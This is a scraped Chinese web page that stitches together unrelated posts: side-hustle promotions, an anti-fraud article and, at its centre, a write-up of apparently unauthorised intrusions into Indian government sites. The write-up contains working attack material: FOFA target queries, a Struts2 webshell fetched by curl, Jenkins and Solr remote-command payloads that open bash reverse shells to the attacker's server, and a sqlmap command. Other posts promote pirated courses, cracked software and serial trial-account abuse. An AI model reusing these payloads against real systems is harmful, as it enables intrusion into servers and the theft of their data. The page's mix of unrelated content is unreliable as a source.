围观地址：https://weibo.com/2479238731/NeTpRjTZh...

围观地址：https://weibo.com/2479238731/NeT5Fl1tv...

围观地址：https://weibo.com/7744876007/NeSTjbL0A...

围观地址：https://weibo.com/2479238731/NeSH7A4CU...

围观地址：https://weibo.com/2479238731/NeJEHeTD1...

围观地址：https://weibo.com/2479238731/NeOn4bmRf...

大家好，我是富哥创业笔记创始人懂事长，近期AI小和尚图片说话视频瞬间爆火，相信许多人已经观看过了，随便一个视频都是几十万，上百万播放量。 操作方式简便，粉丝增长迅速，吸引了众多人加入其中。 前段时间由于过于繁忙未能关注，这几天实际操作了一下，并向大家汇报一下情况。 一、项目优势 这种玩法的优势在于其新颖性，能够激发人们的好奇心。此外，老者或小和尚所说的话语中蕴含的哲理思想也能够引起观众的强烈共鸣，因此视频的停留时间较长，流量较大。最重要的是，制作这种视频非常简单，而且制作出来的是原创视频。熟练掌握后，基本上只需要十几分钟就能制作出一个完整的视频。 如图所示下方 由AI生成的图片，通过配音软件结合图片-视频处理软件，实现仿真模拟真人说话的效果。所说的话语通常包括祝福语、心灵鸡汤、禅语、两性情感等内容。 二、账号数据 最近30天49条作品，涨粉44.2万，直接干到了周涨粉榜单25名。这个数据很诱人。 我自己实操下来，3个新号，一周之内可以到上万粉以上，拿来起号，安全有效! 三、变现手段 有些人可能会担心这种账号的粉丝不易变现，实际上，只要有流量就能轻松实现变现，接下来分享几种变现手段。 1、带货 根据粉丝画像来看，主要是以女性宝妈或中老年群体为主。这些人要么需要心灵寄托，要么对人生百态已有深刻认识。 2、小程序取图变现 因为制作的视频中人物是卡通的，所以可以通过引导粉丝去小程序取图变现，比如力推图，神图君等等。 3、招募学员变现 当你账号流量大了，粉丝基数大了后，自然而然会有很多人主动找你来咨询，如何制作类似短视频，那么你可以通过招募学员来变现。 四、操作流程 1、制作图片 首先，我们需要生成一张小和尚/老者的图片。 有两种方式：一种是直接从其他账号中找到小和尚的照片，然后截图下来进行使用即可。另一种方式是使用midjourney来生成图片，在淘宝上可以找到账号，一个月的费用大约在十几元左右。难点在于相关的ai绘画关键词。前期可以通过图片来生成描述关键词，然后再通过描述关键词重新生成图片，从而实现原创。 首先，我们找到一张图片，然后发到midjourney，他会生成4条描述关键词。 第二，复制这些英文关键词，翻译成中文，然后再稍微修改下，或者添加一些关键词进去，比如光头，白，胖，萌萌的、可爱等。 比如 6-8岁的男孩，穿着僧袍，光头小和尚，有酒窝、有点胖、白皮肤，娃娃脸，始终保持微笑。8K分辨率，saurabh jethani，细致的技术，tetsuo hara，可爱，mao hamaguchi --ar 9:16(Bald little monk smiling in monk's robes, white skin, baby face, a little chubby, don't accessorize, light orange style, 8K resolution, saurabh jethani, meticulous technique, tetsuo hara, cute, mao hamaguchi --ar 9:16) 第三，用英文发送指令后，会给你生成4张图片，点击U1-U4，会给你生成高清版本图片;点击V1-V4，又会给你再生成4张图片。 2、提取文案 第一种，一键快速实现，使用我推荐的AI文案工具，再里面输入：让它帮你生成心灵鸡汤、禅语等相关语录。 第二种，先把对方视频保存下来，然后通过一款视频文案提取神器，把视频里的文案内容提取出来，然后再发送给上面的ai文案工具生成文案，进行伪原创。注意，开头往往是黄金三秒，一般是视频核心，不要修改，照抄即可。 第三种，可以去百度搜索相关语录，或者一些心灵鸡汤类的书籍去摘选出来，也是可以的。 文案这个环节很重要，一定要重视文案的原创性，只要原创内容，那么你的播放量会很高。实操下来，最近操作祝福语文案类的短视频，播放量、点赞量、评论量都很高。 3、生成配音 文案有了，接下来就是将文案进行配音。用魔音工坊、配音神奇pro等一些配音工具进行配音即可，看下面图片进行操作。 4、图片变动图 下面分享两种让图片变成动画效果的方法。 一种是使用heygen，效果很好，缺点一个账号只送1积分试用，两个视频就用完了。 另外一种，d-id，studio.d-id.com，不仅可以合成视频，还可以直接生成你想要的人物形象，更省事，以及不同的视频尺寸。效果稍微差一些，一个账号送20积分，但是可以做6-8个视频，一个账号用完了，就再注册一个账号，基本上可以实现免费使用了。 5、制作短视频 将第四步生成的视频导入到剪映里，识别字幕、添加背景音乐、调色、混合等等方式制作原创视频。比如通过第三款工具，给小和尚背景添加寺庙、山水、下雨等背景特效，这样让视频变得更丰富些。 今天就分享到这里啦，希望这些干货能帮助一批新手破局迷茫，能够变现!!! 作者：懂事长 公众号：富哥创业笔记 ...

打卡日历是一款帮助养成好习惯的APP软件，在打卡日历里，用户可以建立丰富全面的日历日程服务，提供日程相关的天启、醒着、运势以及好货好物等推荐服务，帮助用户养成并建立个人良好的作息生活习惯等等。福利：红包，每天都可以领取，新人稳撸40+   一、VX扫码下载，这个和之前咱们介绍过的幸运蛙有点像是，差不多是一个玩法，模式也是相同。玩过的都知道非常粗暴高收益。亲测玩了十来分钟就撸了40米红包了。 链接：邀请链接 二、首页有个新人宝箱，点开然后看十来个广告视频，然后参与3次游戏后，就可以得20红包，另外每天签到都能获得1元，收益可以说非常可观。 ...

不违法，不违规，原理用抖音发视频，小程序广告收益分成。 ​ ...

0x01、信息收集阶段 ==注：本次信息收集过程主要使用FOFA网络探测平台 https://fofa.info/=== 一开始进行收集的时候，有点迷，直接进行了大面积的"gov.in"域名收集 host="gov.in" && country="IN" 哈哈68465条数据，想想就起飞，但是有个问题来了，怎么下载到本地，高级用户的API也只能调用下载1w条数据，左思右想。 试着写了个脚本看看： import pythonfofa import csv filename = "IN_domain.csv"   email = 'u_mail'key = 'u_API_KEY'search = pythonfofa.Client(email, key)get_data = search.search('host="gov.in" && country="IN"', size=70000)   print(get_data)   requests = [result[1] for result in get_data['results']]print(requests)   打开CSV文件并设置写入模式   with open(filename, "w", newline="") as file:writer = csv.writer(file)   遍历请求列表   for request in requests:   在控制台打印域名   print(request)   检测域名是否包含"http://"   if not request.startswith("http://") and not request.startswith("https://"):   如果不包含，则在域名前添加"http://"   request = "http://" + request   在域名后添加斜杠"/"   request += "/"   将请求和值"1"作为一行写入CSV文件   writer.writerow([request, 1])   是的，肯定不能跑，下断点，调试看看 很好确实是不能直接干7w条，换个收集思路，收集主流框架进行相应的漏扫 主流框架的相关漏洞的FOFA规则语句： Fastjson app="Fastjson" && host="in" && country="IN" && status_code="200" && (port="80" || port="443") Struts2 app="Struts" && host="in" && country="IN" && status_code="200" && (port="80" || port="443") Log4j2 (app="Log4j2" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")) 其他的也都大同小异，照葫芦画瓢就行。 目标站点收集差不多了，就是漏洞探测阶段了。 【----帮助网安学习，以下所有学习资料免费领！加vx：yj009991，备注“freebuf”获取！】 ① 网安学习成长路径思维导图② 60+网安经典常用工具包③ 100+SRC漏洞分析报告④ 150+网安攻防实战技术电子书⑤ 最权威CISSP 认证考试指南+题库⑥ 超1800页CTF实战技巧手册⑦ 最新网安大厂面试题合集（含答案）⑧ APP客户端安全检测指南（安卓+IOS） 0x02、漏洞探测及利用 Struts2： 直接掏出大范围漏扫AWVS就行批量漏洞探测： 第一天数据就直接起飞，因为本次目标是==getshell==直接忽略中低危漏洞告警，查看高危漏洞： 很好一堆==Struts2==漏洞，直接上工具： 得到一个RCE（远程命令执行漏洞），远程写入==shell==，先利用工具生成一个==Antsword(蚁剑)jsp格式的shell== 将shell放到一个公网服务器上，接着执行命令查看web路径：/var/tomcat9/pmrportal/ROOT/ 直接执行 curl -o /var/tomcat9/pmrportal/ROOT/shell.jsp http://u_ip/antsword.jsp 然后webshell工具Antsword连接即可： 爆出的该S2-045的漏洞的还有几个，getshell方式同上，不进行细述了___________。 Weblogic： 很好用的awvs，直接上工具注入内存马： 冰蝎连接webshell： 同类型的漏洞还有几个，getshell的方式都一致，不一一概述了》》 （PS：这个时候已经有些疲软了，没有去手测upload的点） Jenkins： 中途其他框架没有收获的时候，就去浏览知识的海洋了，看到一个存在大量未授权+RCE的框架漏洞（Jenkins），二话不说，直接上FOFA： (app="JENKINS" && title=="Dashboard [Jenkins]" && country="IN" && status_code="200") && (port="80" || port="443") 一看86条资产，有戏，数量不多，直接手测： 存在未授权，访问manager --> script页面，进行命令执行测试： println "ls -al".execute().text 存在命令执行，尝试反弹shell： println "bash -i >& /dev/tcp/ip/port 0<&1".execute().text 接收shell的服务器开启端口监听： 执行命令 发现没有shell反弹过来，猜测不能在web端执行反弹shell，于是将反弹shell的命令写入.sh文件中，然后执行，进行反弹shell操作： 在sh文件中写入如下内容： bash -i >& /dev/tcp/ip/port 0<&1 保存在开放的web端口，在jenkins服务中执行如下curl命令远程下载sh文件： println "curl - o /tmp/jenkins.sh http://u_ip:port/jenkins.sh".execute().text 查看.sh文件是否获取成功： println "ls -al /tmp".execute().text 获取.sh文件成功，执行文件，反弹shell： 开启监听： 执行命令，启动.sh文件： println "bash /tmp/jenkins.sh".execute().text 成功监听到谈过来的shell，又拿下一台！其他的没有存在未授权，便没有尝试。 Apache-Solr 闲着没事，打开文库看了几篇RCE复现，心血来潮，打开FOFA： country="IN" && app="Apache-Solr" && status_code="200" && (port="443" || port="80") 数据不大，接着手测，拿到三个未授权(不需要登陆)： ==授权==： ==未授权==： 拿到未授权之后，进行CVE探测： 访问/solr/admin/cores/，获取name => music 接着拼接路径/solr/music/config/查看用户配置信息： 都为true，可直接利用公网披露的payload进行RCE， GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22whoami%22))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 测试是否出网： 修改执行命令为 curl%20xtolsc.dnslog.cn 可出网，直接反弹shell： GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2xxxxxx8xMDEuNDMuMTM5LjI0My81MDAwIDA%2BJjE%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: ip accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close VPS开启端口监听：nc -lvvnp 5000 接听到弹过来的shell了，好，又拿下一台，root权限。 其他漏洞发现 反射型XSS 具体测试过程均无任何难度，无须bypass黑名单之类的，测试语句 <script>alert(1)</script> SQL注入 这类没有具体测试，发现注入点之后直接上SQLmap开扫： sqlmap https://******.gov.in/****/Validate.jsp --data "email=a@a.com&password=123456" --random-agent -t 10 -p password --proxy=http://127.0.0.1:7890 --dbms=mysql 诸如其他的漏洞也有发现，但不是本次渗透的重点，便没重点去深入。 渗透总结 本次测试周期长，测试目标暴露点多，非常有趣的一次渗透实战，后期有其他事儿，就没法全身心投入，蛮可惜的。...

《孤注一掷》，原来这些人最容易被诈骗 最近，你看了诈骗电影《孤注一掷》吗？“想成功先发疯，不顾一切向钱冲；拼一次富三代，拼命才能不失败；今天睡地板，明天当老板！”诈骗工厂里的被骗去打黑工的人们一次次高呼着朗朗上口的口号。铺天盖地的钞票、被沉入海底的性感美女**屏蔽敏感词**、变卖全部家产后跳楼的赌徒、被打到鼻青眼肿的高新技术程序员、本想出国淘金，却意外落入境外诈骗工厂陷阱的大量受害者......哪怕你没看过这部电影，但这些熟悉的镜头，经典的台词，在抖音等社交平台上持续传播，里面的部分片段甚至还引发了无数网红模仿。   剧照来自《孤注一掷》官方账号 该电影取材自上万起真实诈骗案例，境外网络诈骗全产业链将在大荧幕上被首度揭秘，影片不仅在内容上引人深思，同时在形式上也有其独特之处。影片聚焦于网络诈骗背后的盘根错节，千种万种套路，以揭秘的视角为观众讲述背后的故事，赚足了观众的好奇心和眼泪。 可能有些人认为，电影里演的不过是情节所需罢了，这些境外诈骗离我们很遥远，只要自己不出国不就行吗？事实上，它们离我们真的很近。   骗子的套路，远比我们想象的深在这部电影中，作为诈骗工厂的绝对掌权者，诈骗头目陆秉昆（王传君饰）十分擅长洞悉那些急功近利者的弱点，并将蛊惑人心那一套，玩转到了炉火纯青的地步，其手下阿才（孙阳饰）则负责以暴力相威胁，两人分工合作，从心理和生理进行双重压制。 高薪诱惑实则骗局，海外淘金梦碎 影片开场，自视清高的计算机程序员潘生（张艺兴饰）在被关系户顶掉职位后愤然离职，决定接下某新加坡公司的offer，踏上“新生活”的征程，却不料其实是电诈集团的精心设置的圈套。同时，另一位主角嫩模安娜（金晨饰）遭人诬陷后被公司停职，随后被所谓的“朋友”欺骗，认为出国做赌场**屏蔽敏感词**，真的能淘金。于是主角两人双双落入海外高薪骗局的陷阱。这个角色设定其实也在告诉我们，无论学历高低，无论职业，哪怕是聪明人也一样会被骗。高智商、高学历的人被骗的案例比比皆是。这就是目前境外诈骗最典型的高薪务工骗局。       近年来，不断有人被所谓高薪职位的“年入百万”、“报销机票”、“稳赚不赔”等信息所诱惑，幻想能一夜暴富。然而，在那边等待他们的，并不是什么年薪百万元的工作，而是被限制人身自由，遭受挨饿、毒打、电击等惩罚，以及残害肢体、割取器官等非人折磨，有人甚至因此而命丧他乡。有不少回流人员曾在采访中讲述过境外那些不堪回首的日子，其表示身陷境外诈骗公司的大多是学生、务工人员等年轻群体，偷渡踏出国门的那一刻就是他们噩梦的开始。面对惨无人道的胁迫这些“新入职”的受害者不得不屈从，在酷似监狱的高墙和铁丝网内，被全副武装的保安和打手看守，不得不在诈骗头目的指使下进行电诈、贩毒、**屏蔽敏感词**等违法犯罪活动。要明白，这个世界上没有免费的午餐。任何时候都要谨慎对待网上的诱惑，不要轻信陌生人，更不要盲目前往战乱贫困地区。 十赌十输，“小赌怡情”是最大的骗局 影片中的第二个桥段是围绕赌棍阿天（王大陆饰）展开的。大学还没毕业的他，就已经有房有车，还和几位志同道合的好朋友经营着工作室的小事业，还有一位善解人意的女朋友，原本家境优渥，事业爱情双丰收的他，却沾染上了**屏蔽敏感词**。起初只是小玩两把，之后越来越大越来越不可自拔。诈骗集团利用他的贪欲，一步步引诱他下注，阿天倾尽所有，用自己名下唯一房产孤注一掷，发现被骗后万念俱灰，最终选择了跳楼。而镜头一转，电诈集团据点内欢声不断，头目与马仔们肆意欢庆，庆祝业绩大丰收。一边是一个家庭的破碎，另一边是欢乐的庆祝，强烈的对比令人深思。诸如此类的事件不在少数，打开百度随便一搜就有无数真实案例。 境外诈骗组织往往会为赌徒量身定制一点蝇头小利，让他们自以为抓住了所谓的“幸运”，继而贪欲会将他们带入**屏蔽敏感词**的深渊，负债累累的赌棍们最终无奈之下投身于组织，成为永远不见天日的绝望囚徒。事实上，这种新型**屏蔽敏感词**方式背后有一套从境外向境内、自上而下的组织架构。境外组织者位于架构的顶端，国内各级代理是下线，负责扩大参赌人数，吸纳赌资。境外**屏蔽敏感词**集团通过对正规网站植入黑链、群发短信、微信群、QQ群引流等手段宣传推广，引诱参赌人员注册、充值**屏蔽敏感词**，**屏蔽敏感词**资金通常通过网银或第三方支付平台进行流转。而网络**屏蔽敏感词**往往由所谓的庄家设局，利用提前算好概率、内外串通、APP外挂等手段，欺骗参赌者投注资金，因此网络**屏蔽敏感词**可谓“逢赌必输”。除此之外，**屏蔽敏感词**团伙在微信群、QQ群利用“发红包”功能，通过群聊进行“赌大小”“压数字”等**屏蔽敏感词**活动。还有一些披着棋牌游戏外衣的**屏蔽敏感词**APP，在游戏过程中发生赌注交易，并在赌资提现时，编造所谓“差价”和“汇率”，牟取大量利益。**屏蔽敏感词**是一种极富风险和诱惑力的活动，许多人常常过于轻视其中的风险，抱着侥幸心理去参与。然而，毋庸置疑地，**屏蔽敏感词**的本质就是十赌十输。 现实版境外诈骗，远比电影惨烈百倍千倍 事实上，电影中所呈现的诈骗集团只算中等规模，真实生活中受害者的数量达到惊人的千万级、亿级。每个案件背后，不仅仅是重大的经济损失，更可能牵连到一个个家庭的瓦解与崩溃。阴暗世界的可怕真相远非片中所呈现的那般简单，而诈骗集团使用的手段也并不止有电影中的那几种。 心狠手辣，靠卖血卖器官赚钱 有回流人员在接受采访中曾透露，自己被中介的诱惑下偷渡至缅北，进了诈骗组织被迫成为一名电信网络诈骗客服，每天的伙食就是一个馒头两瓶水，完不成当天安排的“诈骗业绩”就要挨打，针扎手指、被火烫等都是常有的事。他也曾试图逃跑，但结果就是再次被抓回，回去后被抓进满是臭水的水牢里关了15天，并且每天还被抽取大约6罐可乐瓶容量的血，连抽了多日用以卖钱直到他失去意识。据他回忆，曾亲眼目睹其他同事被勒索赎金，如果没钱就用剁手指来偿还赎金，一根手指1万元，连剁三根；还有的人会被黑市医生现场开膛破肚，将能用的器官都“当场噶掉并拿入黑市进行售卖”。当然，也有被直接枪毙的。 人口贩卖，卖淫、电击、水牢是常规操作   据回流者透露，被骗去做电信诈骗的人们，如果业绩少就只能吃狗食，住十几人的大通铺，门窗封死防止逃跑，屋内环境恶劣，气味恶臭。同时，屋外每天24小时有荷枪实弹的雇佣兵看管，被公司买卖的人，甚至要戴着手铐脚铐去工作。如果每天被安排的任务未完成就要接受皮鞭抽打、电击、关水牢、砍手指脚趾等惩罚。长期没有业绩的人会被转卖给组织卖淫或售卖人体器官的公司。回流者称：“中国人在那里是行走的人民币，一个人头的价值少说也在10万元以内。一个20来岁的人，可以卖出去20万元，那里的人口贩卖已经形成了一条黑色产业链。”由此可见，诈骗集团内的黑暗程度是人们想象不到的。在那里，人命甚至是被明码标价的。 吞噬人性，让人倾家荡产的“杀猪盘”   还有一些诈骗组织让“新入职”的受害者冒充“离异高富帅”、“离异白富美”或“单身成功人士”等人设，在网上寻找“猎物”，一步步设下圈套陷阱，他们利用人们内心最渴望的情感需求，以假意骗取异性的信任，让对方陷入情感陷阱中，然后用内幕消息引诱他们投资或者**屏蔽敏感词**。为了让受害人彻底陷入骗局，一些诈骗组织还会特地找好几个漂亮的女模特随时待命。这种方法往往能让人在短时间内产生情感依赖，并心甘情愿“掏空钱包”，有的甚至倾家荡产、负债累累、最终落得一个家破人亡的悲惨结尾。这种犯罪集团采用的诈骗手法俗称“杀猪盘”，具体逻辑分以下几步： 第一步，取得信任（圈猪）。业务员通过网络社交平台锁定受害人，并将自己包装成单身的成功人士进行交友，添加好友后，通过嘘寒问暖来博得受害人信任。 第二步，怂恿投资（养猪）。业务员拉进与受害人的距离骗取信任后，开始向受害人介绍某个投资（福利彩票）平台，引导受害人扫二维码或点击链接进入该平台投钱，诈骗集团人员通过后台操作，先让受害人小赚几笔，受害人尝到甜头后，继续投入大额资金。 第三步，无法提现（杀猪）。当受害人以为获利并要从平台提现时，发现诈骗集团已将其拉黑无法提现。通过这种方式，该诈骗集团骗取数百万元。 所以，任何时候都不要被“天上的馅饼”蒙蔽双眼，对突然出现的“高薪、巨利、暴富”等网络信息统统说不！要增强防骗意识，认清虚拟的网络世界，往往你以为的一夜致富的路，其实背后是一个没有底线的利益团伙铺下的陷阱罢了。 冒充公职人员，伺机植入病毒散尽钱财   冒充身份类诈骗目前已成为电诈案件高发的“重头戏”，在诈骗套路的不断更新变化中，骗子角色扮演的套路越来越深，让人防不胜防。他们会通过伪造的身份信息，冒充银行、政府机构、互联网平台客服等人员，发送虚假的邮件、短信、电话，以获取个人敏感信息，或者诱惑被害人进行转账等。比如之前就曾有过类似案件：骗子通过投资理财、财务交流、公司内部等微信、QQ群或电子邮件，传播名为“2023企业个人最新版所得税缴纳标准”、“电子发票”等压缩文件，打开后文件内容均为空白，实际系木马病毒。一旦财务人员点击下载并解压，就会立即被植入木马病毒，继而骗子就会通过病毒获取电脑后台权限，实现截屏、录屏、监控等方式，“观察”公司财务转账及内部交流情况。待时机成熟后，骗子还会制造卡机、黑屏，并远程控制受害人电脑端微信（QQ或钉钉），删除老板真实聊天账号，添加“克隆”账号（使用相同头像及昵称），进而“指挥”公司财务进行转账。还有骗子会冒充公安民警、军人、消防官兵等公职人员进行诈骗，他们能准确说出你的身份证号、联系方式和家庭住址取得你的信任。并谎称你名下的银行卡涉嫌洗钱、诈骗等，要求你配合调查。他们利用公检法威信力来击破受害人的心理防线，使其陷入恐慌，失去判断。通过聊天工具发送逮捕证、通缉令等材料，还会发来警察办公等视频，进一步击溃受害人的心理防线。最后以配合各种调查为由，循序渐进向当事人索要银行卡号、验证码等信息，最终达到骗取钱款或盗刷当事人各类账户财产的目的。毫无底线的罪行、闭塞恶劣的环境、无孔不入的诈骗手法种类繁多、千变万化，上述几个类别其实不过只是冰山一角。随着网络时代不断发展，未来骗子的诈骗的手段只会越来越“精进”，但万变不离其宗，正所谓“见招拆招”，提高分辨能力，不轻信“天上掉馅饼”的好事，很大程度上能避免许多骗局。淘金梦醒后，只剩人间炼狱 官方曾有统计，目前境外窝点实施的诈骗占了国内总诈骗案件数的六成以上。而这些境外电信诈骗的案件中最大一部分，就来自“诈骗圈的耶路撒冷”——缅甸北部。在许多网络小说和影视剧中，缅甸北部被描绘成一个充斥着机遇的冒险之地，人人都有可能在那里闯出属于自己的一片天地。而现实情况是，由于复杂的历史和政治因素，缅北到现在仍然是一个充斥着混乱、罪恶与杀戮的是非之地。在规模庞大的黑灰产业密切配合下，境外电信网络诈骗已经形成了完整的分工链，从信息买卖、实施诈骗到分赃销赃，一应俱全，甚至还有大数据和AI技术的辅助。像缅北这样的诈骗者聚集地，更是团伙协作，各司其职，环环相扣，剧本越来越专业，对象越来越精准。境外诈骗人员一次次深入窥探人们的心底贪念，只要稍有不慎，就会落入他们精心编织的电信网络诈骗陷阱。“高薪工作，待遇优渥，工作轻松，无需文凭，月薪5万起，包机票，包食宿……”这些招聘信息精准地击中了那些做着发财梦、渴望赚快钱的人们。贪念如罂粟，短期内让人飘飘欲仙。时间一长，便让人深陷泥潭，无法自拔。不管学历再高、也不管你是何种职业，只要贪念一起，在骗子眼中，你就是待宰的羔羊。请谨记天上不会掉馅饼，能砸在你头上的，99%都是陷阱。所有的捷径，都要付出相应的代价，而捷径带你走向的，往往不是成功，更可能是万丈深渊。对于大多数普通人来说，突降的境外的高薪工作背后藏匿的不过是鲜血和无尽的折磨，以及充满暴力与杀戮的黄赌毒产业链。待淘金梦醒后，睁眼再看到的，大概只剩人间炼狱。 反诈课堂|这份老年人防诈骗指南请收好 近年来， 诈骗套路层出不穷， 一些不法分子利用老年人 信息闭塞、渴望健康、认知较弱的特点 骗取老年人钱财。 常见的诈骗套路有哪些？ 01 提供养老服务 以投资养老基地、旅游考察、预售养老床位等项目为名，将老年客户诱骗至所谓养老基地、福利院进行参观、游玩，进而以预售养老床位等名义非法集资。 02 金融投资 “限量发行”“绝世珍藏”等宣传语常被不法分子用来吸引老年人投资，一些不法分子还许诺在短期内会帮助老年人将纪念币进行拍卖以实现“收益翻番”。同时，还有不法分子利用“海外股权”“天使投资”等新兴金融概念混淆视听，诱使老年人购买产品。 03 低价购物 不法分子发布低价二手物品转让信息，一旦与其联系，便以缴纳定金、手续费等为由骗取老年人钱财。 04 免费赠送 老年人十分注重养生，诈骗分子借此诱惑老年人高价购买毫无用处的保健品，某些受疾病困扰的老年人会相信诈骗分子所说的各种“神奇”的偏方疗法。诈骗分子打着免费送鸡蛋、水果、小家电的幌子，租用专门场地向老年人宣传“保健产品”、“治疗药品”，夸大产品功效诱惑老年人，从而实施诈骗。 05 低价旅游 旅行社以低价游、免费游的噱头吸引老年人参团旅游。随后在旅游过程中安排各种购物环节，将商品以高于市场价多倍的价格卖给老人们。除此之外，还有部分旅行社降低住宿、饮食标准，或将各种需要付费的景点排除在低价团费之外。 06 冒充中奖 不法分子以热播电视节目组的名义向老年人发送短信，称对方已被抽选为节目幸运观众，以获得奖金需交手续费、保证金等为由实施诈骗。 7 冒充公检法 诈骗分子通常会伪造相关证件和文件，冒充公安、检察院、法院等工作人员，利用老年人的薄弱法律意识和恐慌心理，以及对子女的关心，声称要执行逮捕，须缴纳保障金等手段，骗取老年人的钱财。 08 黄昏恋 “黄昏恋”骗局其实就是“杀猪盘”骗局的一种，主要针对独身老人，通过网络发展成为网恋后，通过编造各种理由索要钱财，随后拉黑对方，完成诈骗。 09 冒充亲友 不法分子利用非法手段获取老年人信息后，伪装成老年人的亲友，以借款、救急等理由发送短信，要求老年人向其转账汇款。 诈骗手段日益更新，老年人千万要小心！防骗妙招请收好 防诈骗指南 01 戒除贪婪心理   </p>   </p> 不轻信有包治百病的灵丹妙药和天上掉馅饼的免费午餐，不要轻信不明对象及可疑信息，对高息产品提高警惕。 02 强化警戒心理   </p>   </p> 遇事保持冷静，多调查、多思考，面对陌生人不轻易相信、不盲从，个人信息要保密。 03 讲科学，不迷信   </p>   </p> 面对保健养生类诈骗，做到“两要、两不要”，即不要相信有包治百病的神丹妙药，如果患有疾病，主动就医，保健品不能治愈疾病。相反，伪劣的保健品会加重患者的病情，贻误治疗良机。 04 常与亲友沟通   </p>   </p>   </p> 遇到拿不定主意的事情不急于决策，不固执己见，多听取亲友意见，常与亲友交流。从亲属子女角度，则要与家庭中老年人更多交流，对他们给予更多关爱。...

据了解，当年淘宝刚开始上线投入使用的时候，作为一个新生的产品，很多人都难以相信这种虚拟交易，毕竟商品买卖一直都是一手交钱一手交货，突然看不到钱也看不到货，谁也不愿意冒这个险。 直到有了第一个敢于“吃螃蟹”的人，他的名字叫崔卫平。他之所以接受这种交易方式，可能和他在国外留学的经验有关。 他是一位身在日本的留学生，把自己闲置的“富士相机”挂到了淘宝上出售，有一些买家喜欢他的二手相机，但是交易双方对彼此的信任度都很低，所以数码相机一直没有卖出。为了方便交易的顺利完成，阿里巴巴还为淘宝、支付宝设计开发了第三方交易平台，告诉买卖双方交易是有保障的。 最后这台相机在淘宝客服的“热心帮助”下成功出售了，这个记录今天还留在支付宝大楼里。 @新熵的微博...

今天给大家带来的项目是《一单利润99 一周能出1000单，卖杏商课程合集(海王秘籍)，暴力掘金》“情人节“，即将来临，关于“性商”方面的课程，肯定会大卖！这类课程的需求很大，我已经帮大家整理好课程合集给大家，一共517G，出去打包卖99，很合理！而且，课程内容很齐全，可以拿出去迈，也可以自己“不学习”。 课程目录： 项目资料（512G杏商课程）（文件夹）01 简单的项目介绍02 简单的账号设置03 爆款作品的逻辑？04 如何引流才不封号？05 四种暴力变现方式 ...

免授权，原作者卖88，带七套模板之前有分享过 1.7.1 的影视计费系统，那个版本很久了之前也一直没有更新，拿到源码之后进行优化，因历史版本的加载和原版的加载速度真的是慢的感人，因此从零开始进行去授权，所有源码均本地化，避免因为外链导致的程序不能正常使用，就对比来说，我个人认为扶风的计费会比云海的比较相对操作好上手，且 bug 也少，而且网商众多的的都是历史版本，因此觅知更新优化一般最新 V1.8 版本免授权版本，带有七套模板 安装教程： 后台管理员账号密码：你的域名/admin 账号密码，admin 123456 优点：就是完全摆脱官方束缚，他坏了倒闭了，自己还能用所有核心代码本地化， 解决外链代码响应慢的问题 安装教程引导： 1、运行环境 PHP7.0 数据库 mysql 5.6 必须是7.0php 安装SG11扩展 2、上传本源码将文件全部解压到网站根目录 3、直接将根目录的找到 mysql.php 这个文件修改数据库为自己的，文件中有注释 4、再导入数据库v1.8.2_98dou_cn.sql 5、进入后台修改你自己需要修改的地方 因为所有代码都本地化了，因此安装包比较大，但保证进入后台和用户端响应速度，不受外链影响 如安装之后出现前台用户注册之后登入不了的情况，查看此链接教程设置 进入宝塔后台–软件商店—找到mysql把下面的这里的语句改一下将mysql的配置中搜索：sql-mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES修改成sql-mode=NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION   修改后保存退出即可 ...

冷门高需求 现在市场上没有同行 超级详细教程 全程实操来了 陪跑项目价值几千 ...

哈喽，大家好，欢迎来到男粉项目3.0，无脑操作日入1000+，全自动变现，全网独一份。 那么关注我们的学员呢，应该知道我们这个南粉项目是从四月份开始做的，四月份呢，我们做出了粉项目1.0，那个时候是账号最好做的时候， 还记得很多学员一晚上赚个五六百，轻轻松松，后来呢，因为课程呢不太详细和基础，做出了咱们男粉项目2.0！ 那么在了解快手的学员应该都知道，在六月份的时候，快手的推荐机制迎来了一次大改变，如果你一直没有断更那还好，但是只要你断更超过三天，那么你的流量呢就会变成虚假的流量，无论是新号还是老号都需要经过激活流量，这个激活流量的时间呢，也会变得更长，一周甚至两周三周的时间都有可能！   所以呢，半仙呢，在察觉到这个情况之后，就立刻改变了策略，不能只做一个平台，终于呢，在经过半仙个月的测试之后，大家呢，可以看一下我的收益。这个呢是我昨天也就是8月11号晚上五点半的时候截取的一个收益图，这是从8月1号到11号做的一个收益，现在呢收益已经接近3万了！ 虽然呢现在的转化率跟以前没有办法比，但是呢咱们的曝光量是提上来了，很多人呢也听过这么一句话，只要有流量呢，做什么都会赚钱，没错，学完本套课程之后，你就会明白，原来流量的获取啊是这么简单。 那么接下来呢，看一下我们的目录！ 